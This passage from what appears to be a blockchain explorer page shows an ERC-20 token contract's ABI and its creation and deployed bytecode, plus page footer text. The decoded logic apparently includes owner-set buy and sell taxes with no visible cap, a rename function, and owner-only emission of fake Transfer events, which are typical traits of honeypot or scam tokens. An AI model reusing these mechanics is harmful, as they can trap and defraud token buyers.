uts":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"name":"ratioChange","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint8","name":"_buy","type":"uint8"},{"internalType":"uint8","name":"_sell","type":"uint8"}],"name":"taxRemove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040526005608090815264526174696f60d81b60a0525f90620000259082620004a0565b50604080518082019091526005815264524154494f60d81b6020820152600190620000519082620004a0565b506002805461ffff1916610303179055600a805473938f702c8591fc6c254ce92e5c226b29990156836001600160a01b03199182168117909255600b8054735b2bd5c1f9f0bdd8e1b10f7bd51f94ae1ad914ad908316179055600c805473c712ca2865b732414e2aef7114b3fb4db55ad357908316179055600d80549091169091179055348015620000e1575f80fd5b5060098054336001600160a01b03199182168117909255600680549091169091179055305f908152600460209081526040808320737a250d5630b4cf539739df2c5dacb4c659f2488d845290915290205f1990556064620001456012600a6200067b565b620001569064174876e80062000692565b6200016390601962000692565b6200016f9190620006ac565b600980546001600160a01b039081165f90815260036020908152604080832095909555600754935483168252848220549451948552929091169290915f8051602062001868833981519152910160405180910390a36064620001d46012600a6200067b565b620001e59064174876e80062000692565b620001f290601962000692565b620001fe9190620006ac565b600a80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f8051602062001868833981519152916200024a91815260200190565b60405180910390a36064620002626012600a6200067b565b620002739064174876e80062000692565b6200028090600a62000692565b6200028c9190620006ac565b600b80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200186883398151915291620002d891815260200190565b60405180910390a36064620002f06012600a6200067b565b620003019064174876e80062000692565b6200030e90600562000692565b6200031a9190620006ac565b600c80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f8051602062001868833981519152916200036691815260200190565b60405180910390a360646200037e6012600a6200067b565b6200038f9064174876e80062000692565b6200039c90602362000692565b620003a89190620006ac565b600d80546001600160a01b039081165f908152600360205260408082209490945591541680825282822054925190925f805160206200186883398151915291620003f491815260200190565b60405180910390a3620006cc565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200042b57607f821691505b6020821081036200044a57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200049b57805f5260205f20601f840160051c81016020851015620004775750805b601f840160051c820191505b8181101562000498575f815560010162000483565b50505b505050565b81516001600160401b03811115620004bc57620004bc62000402565b620004d481620004cd845462000416565b8462000450565b602080601f8311600181146200050a575f8415620004f25750858301515b5f19600386901b1c1916600185901b17855562000564565b5f85815260208120601f198616915b828110156200053a5788860151825594840194600190910190840162000519565b50858210156200055857878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115620005c057815f1904821115620005a457620005a46200056c565b80851615620005b257918102915b93841c939080029062000585565b509250929050565b5f82620005d85750600162000675565b81620005e657505f62000675565b8160018114620005ff57600281146200060a576200062a565b600191505062000675565b60ff8411156200061e576200061e6200056c565b50506001821b62000675565b5060208310610133831016604e8410600b84101617156200064f575081810a62000675565b6200065b838362000580565b805f19048211156200067157620006716200056c565b0290505b92915050565b5f6200068b60ff841683620005c8565b9392505050565b80820281158282048414176200067557620006756200056c565b5f82620006c757634e487b7160e01b5f52601260045260245ffd5b500490565b61118e80620006da5f395ff3fe6080604052600436106100dc575f3560e01c806379ea94d51161007c578063a9059cbb11610057578063a9059cbb14610245578063b22c95e714610264578063c9567bf914610283578063dd62ed3e14610297575f80fd5b806379ea94d5146101f35780637a9cc6731461021257806395d89b4114610231575f80fd5b806323b872dd116100b757806323b872dd14610162578063313ce567146101815780634022b75e146101a757806370a08231146101c8575f80fd5b806306fdde03146100e7578063095ea7b31461011157806318160ddd14610140575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b506100fb6102cd565b6040516101089190610b0c565b60405180910390f35b34801561011c575f80fd5b5061013061012b366004610b73565b61035c565b6040519015158152602001610108565b34801561014b575f80fd5b506101546103c8565b604051908152602001610108565b34801561016d575f80fd5b5061013061017c366004610b9b565b6103e6565b34801561018c575f80fd5b50610195601281565b60405160ff9091168152602001610108565b3480156101b2575f80fd5b506101c66101c1366004610c1c565b610433565b005b3480156101d3575f80fd5b506101546101e2366004610c97565b60036020525f908152604090205481565b3480156101fe575f80fd5b506101c661020d366004610d4d565b6104ef565b34801561021d575f80fd5b506101c661022c366004610dbd565b610536565b34801561023c575f80fd5b506100fb610581565b348015610250575f80fd5b5061013061025f366004610b73565b610590565b34801561026f575f80fd5b506101c661027e366004610c1c565b6105a3565b34801561028e575f80fd5b506101c6610657565b3480156102a2575f80fd5b506101546102b1366004610dee565b600460209081525f928352604080842090915290825290205481565b60605f80546102db90610e16565b80601f016020809104026020016040519081016040528092919081815260200182805461030790610e16565b80156103525780601f1061032957610100808354040283529160200191610352565b820191905f5260205f20905b81548152906001019060200180831161033557829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103b69086815260200190565b60405180910390a35060015b92915050565b6103d46012600a610f42565b6103e39064174876e800610f50565b81565b6001600160a01b0383165f90815260046020908152604080832033845290915281208054839190839061041a908490610f67565b9091555061042b9050848484610698565b949350505050565b6006546001600160a01b0316331461045d57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104e75784848281811061047957610479610f7a565b905060200201602081019061048e9190610c97565b6001600160a01b0316866001600160a01b03165f805160206111398339815191528585858181106104c1576104c1610f7a565b905060200201356040516104d791815260200190565b60405180910390a360010161045f565b505050505050565b6006546001600160a01b0316331461051957604051629af2b160e81b815260040160405180910390fd5b5f6105248382610fd9565b5060016105318282610fd9565b505050565b6006546001600160a01b0316331461056057604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6060600180546102db90610e16565b5f61059c338484610698565b9392505050565b6006546001600160a01b031633146105cd57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104e7578484828181106105e9576105e9610f7a565b90506020020160208101906105fe9190610c97565b6001600160a01b0316866001600160a01b03165f8051602061113983398151915285858581811061063157610631610f7a565b9050602002013560405161064791815260200190565b60405180910390a36001016105cf565b6006546001600160a01b0316331461066d575f80fd5b600654600160a81b900460ff1615610683575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff16806106bf57506006546001600160a01b038581169116145b806106d757506006546001600160a01b038481169116145b6106df575f80fd5b600654600160a81b900460ff1615801561070257506005546001600160a01b0316155b801561070d57505f82115b1561072e57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f9081526003602052604081208054849290610755908490610f67565b90915550506005546001600160a01b0384811691161480156107815750600654600160a01b900460ff16155b80156107c1575060646107966012600a610f42565b6107a59064174876e800610f50565b6107af9190611095565b305f9081526003602052604090205410155b80156107db57506006546001600160a01b03858116911614155b1561095f576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061082657610826610f7a565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061086e5761086e610f7a565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f613960646108ae6012600a610f42565b6108bd9064174876e800610f50565b6108c79190611095565b5f8430426040518663ffffffff1660e01b81526004016108eb9594939291906110b4565b5f604051808303815f87803b158015610902575f80fd5b505af1158015610914573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f1935050505015801561094f573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109865750600654600160a81b900460ff1615156001145b15610a09576005545f906064906001600160a01b038781169116146109b557600254610100900460ff166109bc565b60025460ff165b6109c99060ff1685610f50565b6109d39190611095565b90506109df8184610f67565b305f90815260036020526040812080549295508392909190610a02908490611125565b9091555050505b6001600160a01b0383165f9081526003602052604081208054849290610a30908490611125565b90915550506008546001600160a01b0390811690851603610a82576007546040518381526001600160a01b038581169216905f80516020611139833981519152906020015b60405180910390a3610b02565b6008546001600160a01b0390811690841603610ac7576007546040518381526001600160a01b03918216918616905f8051602061113983398151915290602001610a75565b826001600160a01b0316846001600160a01b03165f8051602061113983398151915284604051610af991815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610b3857858101830151858201604001528201610b1c565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b6e575f80fd5b919050565b5f8060408385031215610b84575f80fd5b610b8d83610b58565b946020939093013593505050565b5f805f60608486031215610bad575f80fd5b610bb684610b58565b9250610bc460208501610b58565b9150604084013590509250925092565b5f8083601f840112610be4575f80fd5b50813567ffffffffffffffff811115610bfb575f80fd5b6020830191508360208260051b8501011115610c15575f80fd5b9250929050565b5f805f805f60608688031215610c30575f80fd5b610c3986610b58565b9450602086013567ffffffffffffffff80821115610c55575f80fd5b610c6189838a01610bd4565b90965094506040880135915080821115610c79575f80fd5b50610c8688828901610bd4565b969995985093965092949392505050565b5f60208284031215610ca7575f80fd5b61059c82610b58565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610cd3575f80fd5b813567ffffffffffffffff80821115610cee57610cee610cb0565b604051601f8301601f19908116603f01168101908282118183101715610d1657610d16610cb0565b81604052838152866020858801011115610d2e575f80fd5b836020870160208301375f602085830101528094505050505092915050565b5f8060408385031215610d5e575f80fd5b823567ffffffffffffffff80821115610d75575f80fd5b610d8186838701610cc4565b93506020850135915080821115610d96575f80fd5b50610da385828601610cc4565b9150509250929050565b803560ff81168114610b6e575f80fd5b5f8060408385031215610dce575f80fd5b610dd783610dad565b9150610de560208401610dad565b90509250929050565b5f8060408385031215610dff575f80fd5b610e0883610b58565b9150610de560208401610b58565b600181811c90821680610e2a57607f821691505b602082108103610e4857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610e9c57815f1904821115610e8257610e82610e4e565b80851615610e8f57918102915b93841c9390800290610e67565b509250929050565b5f82610eb2575060016103c2565b81610ebe57505f6103c2565b8160018114610ed45760028114610ede57610efa565b60019150506103c2565b60ff841115610eef57610eef610e4e565b50506001821b6103c2565b5060208310610133831016604e8410600b8410161715610f1d575081810a6103c2565b610f278383610e62565b805f1904821115610f3a57610f3a610e4e565b029392505050565b5f61059c60ff841683610ea4565b80820281158282048414176103c2576103c2610e4e565b818103818111156103c2576103c2610e4e565b634e487b7160e01b5f52603260045260245ffd5b601f82111561053157805f5260205f20601f840160051c81016020851015610fb35750805b601f840160051c820191505b81811015610fd2575f8155600101610fbf565b5050505050565b815167ffffffffffffffff811115610ff357610ff3610cb0565b611007816110018454610e16565b84610f8e565b602080601f83116001811461103a575f84156110235750858301515b5f19600386901b1c1916600185901b1785556104e7565b5f85815260208120601f198616915b8281101561106857888601518255948401946001909101908401611049565b508582101561108557878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f826110af57634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156111045784516001600160a01b0316835293830193918301916001016110df565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156103c2576103c2610e4e56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220e350b44e605bbf7493dd212d6be019c5ba04ab91a64cf94e417e0a9b4d766def64736f6c63430008160033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef

Deployed Bytecode

0x6080604052600436106100dc575f3560e01c806379ea94d51161007c578063a9059cbb11610057578063a9059cbb14610245578063b22c95e714610264578063c9567bf914610283578063dd62ed3e14610297575f80fd5b806379ea94d5146101f35780637a9cc6731461021257806395d89b4114610231575f80fd5b806323b872dd116100b757806323b872dd14610162578063313ce567146101815780634022b75e146101a757806370a08231146101c8575f80fd5b806306fdde03146100e7578063095ea7b31461011157806318160ddd14610140575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b506100fb6102cd565b6040516101089190610b0c565b60405180910390f35b34801561011c575f80fd5b5061013061012b366004610b73565b61035c565b6040519015158152602001610108565b34801561014b575f80fd5b506101546103c8565b604051908152602001610108565b34801561016d575f80fd5b5061013061017c366004610b9b565b6103e6565b34801561018c575f80fd5b50610195601281565b60405160ff9091168152602001610108565b3480156101b2575f80fd5b506101c66101c1366004610c1c565b610433565b005b3480156101d3575f80fd5b506101546101e2366004610c97565b60036020525f908152604090205481565b3480156101fe575f80fd5b506101c661020d366004610d4d565b6104ef565b34801561021d575f80fd5b506101c661022c366004610dbd565b610536565b34801561023c575f80fd5b506100fb610581565b348015610250575f80fd5b5061013061025f366004610b73565b610590565b34801561026f575f80fd5b506101c661027e366004610c1c565b6105a3565b34801561028e575f80fd5b506101c6610657565b3480156102a2575f80fd5b506101546102b1366004610dee565b600460209081525f928352604080842090915290825290205481565b60605f80546102db90610e16565b80601f016020809104026020016040519081016040528092919081815260200182805461030790610e16565b80156103525780601f1061032957610100808354040283529160200191610352565b820191905f5260205f20905b81548152906001019060200180831161033557829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103b69086815260200190565b60405180910390a35060015b92915050565b6103d46012600a610f42565b6103e39064174876e800610f50565b81565b6001600160a01b0383165f90815260046020908152604080832033845290915281208054839190839061041a908490610f67565b9091555061042b9050848484610698565b949350505050565b6006546001600160a01b0316331461045d57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104e75784848281811061047957610479610f7a565b905060200201602081019061048e9190610c97565b6001600160a01b0316866001600160a01b03165f805160206111398339815191528585858181106104c1576104c1610f7a565b905060200201356040516104d791815260200190565b60405180910390a360010161045f565b505050505050565b6006546001600160a01b0316331461051957604051629af2b160e81b815260040160405180910390fd5b5f6105248382610fd9565b5060016105318282610fd9565b505050565b6006546001600160a01b0316331461056057604051629af2b160e81b815260040160405180910390fd5b6002805460ff9283166101000261ffff199091169390921692909217179055565b6060600180546102db90610e16565b5f61059c338484610698565b9392505050565b6006546001600160a01b031633146105cd57604051629af2b160e81b815260040160405180910390fd5b5f5b838110156104e7578484828181106105e9576105e9610f7a565b90506020020160208101906105fe9190610c97565b6001600160a01b0316866001600160a01b03165f8051602061113983398151915285858581811061063157610631610f7a565b9050602002013560405161064791815260200190565b60405180910390a36001016105cf565b6006546001600160a01b0316331461066d575f80fd5b600654600160a81b900460ff1615610683575f80fd5b6006805460ff60a81b1916600160a81b179055565b6006545f90600160a81b900460ff16806106bf57506006546001600160a01b038581169116145b806106d757506006546001600160a01b038481169116145b6106df575f80fd5b600654600160a81b900460ff1615801561070257506005546001600160a01b0316155b801561070d57505f82115b1561072e57600580546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f9081526003602052604081208054849290610755908490610f67565b90915550506005546001600160a01b0384811691161480156107815750600654600160a01b900460ff16155b80156107c1575060646107966012600a610f42565b6107a59064174876e800610f50565b6107af9190611095565b305f9081526003602052604090205410155b80156107db57506006546001600160a01b03858116911614155b1561095f576006805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061082657610826610f7a565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061086e5761086e610f7a565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f613960646108ae6012600a610f42565b6108bd9064174876e800610f50565b6108c79190611095565b5f8430426040518663ffffffff1660e01b81526004016108eb9594939291906110b4565b5f604051808303815f87803b158015610902575f80fd5b505af1158015610914573d5f803e3d5ffd5b50506006546040516001600160a01b0390911692504780156108fc029250905f818181858888f1935050505015801561094f573d5f803e3d5ffd5b50506006805460ff60a01b191690555b6001600160a01b03841630148015906109865750600654600160a81b900460ff1615156001145b15610a09576005545f906064906001600160a01b038781169116146109b557600254610100900460ff166109bc565b60025460ff165b6109c99060ff1685610f50565b6109d39190611095565b90506109df8184610f67565b305f90815260036020526040812080549295508392909190610a02908490611125565b9091555050505b6001600160a01b0383165f9081526003602052604081208054849290610a30908490611125565b90915550506008546001600160a01b0390811690851603610a82576007546040518381526001600160a01b038581169216905f80516020611139833981519152906020015b60405180910390a3610b02565b6008546001600160a01b0390811690841603610ac7576007546040518381526001600160a01b03918216918616905f8051602061113983398151915290602001610a75565b826001600160a01b0316846001600160a01b03165f8051602061113983398151915284604051610af991815260200190565b60405180910390a35b5060019392505050565b5f602080835283518060208501525f5b81811015610b3857858101830151858201604001528201610b1c565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b6e575f80fd5b919050565b5f8060408385031215610b84575f80fd5b610b8d83610b58565b946020939093013593505050565b5f805f60608486031215610bad575f80fd5b610bb684610b58565b9250610bc460208501610b58565b9150604084013590509250925092565b5f8083601f840112610be4575f80fd5b50813567ffffffffffffffff811115610bfb575f80fd5b6020830191508360208260051b8501011115610c15575f80fd5b9250929050565b5f805f805f60608688031215610c30575f80fd5b610c3986610b58565b9450602086013567ffffffffffffffff80821115610c55575f80fd5b610c6189838a01610bd4565b90965094506040880135915080821115610c79575f80fd5b50610c8688828901610bd4565b969995985093965092949392505050565b5f60208284031215610ca7575f80fd5b61059c82610b58565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112610cd3575f80fd5b813567ffffffffffffffff80821115610cee57610cee610cb0565b604051601f8301601f19908116603f01168101908282118183101715610d1657610d16610cb0565b81604052838152866020858801011115610d2e575f80fd5b836020870160208301375f602085830101528094505050505092915050565b5f8060408385031215610d5e575f80fd5b823567ffffffffffffffff80821115610d75575f80fd5b610d8186838701610cc4565b93506020850135915080821115610d96575f80fd5b50610da385828601610cc4565b9150509250929050565b803560ff81168114610b6e575f80fd5b5f8060408385031215610dce575f80fd5b610dd783610dad565b9150610de560208401610dad565b90509250929050565b5f8060408385031215610dff575f80fd5b610e0883610b58565b9150610de560208401610b58565b600181811c90821680610e2a57607f821691505b602082108103610e4857634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610e9c57815f1904821115610e8257610e82610e4e565b80851615610e8f57918102915b93841c9390800290610e67565b509250929050565b5f82610eb2575060016103c2565b81610ebe57505f6103c2565b8160018114610ed45760028114610ede57610efa565b60019150506103c2565b60ff841115610eef57610eef610e4e565b50506001821b6103c2565b5060208310610133831016604e8410600b8410161715610f1d575081810a6103c2565b610f278383610e62565b805f1904821115610f3a57610f3a610e4e565b029392505050565b5f61059c60ff841683610ea4565b80820281158282048414176103c2576103c2610e4e565b818103818111156103c2576103c2610e4e565b634e487b7160e01b5f52603260045260245ffd5b601f82111561053157805f5260205f20601f840160051c81016020851015610fb35750805b601f840160051c820191505b81811015610fd2575f8155600101610fbf565b5050505050565b815167ffffffffffffffff811115610ff357610ff3610cb0565b611007816110018454610e16565b84610f8e565b602080601f83116001811461103a575f84156110235750858301515b5f19600386901b1c1916600185901b1785556104e7565b5f85815260208120601f198616915b8281101561106857888601518255948401946001909101908401611049565b508582101561108557878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f826110af57634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156111045784516001600160a01b0316835293830193918301916001016110df565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156103c2576103c2610e4e56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220e350b44e605bbf7493dd212d6be019c5ba04ab91a64cf94e417e0a9b4d766def64736f6c63430008160033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.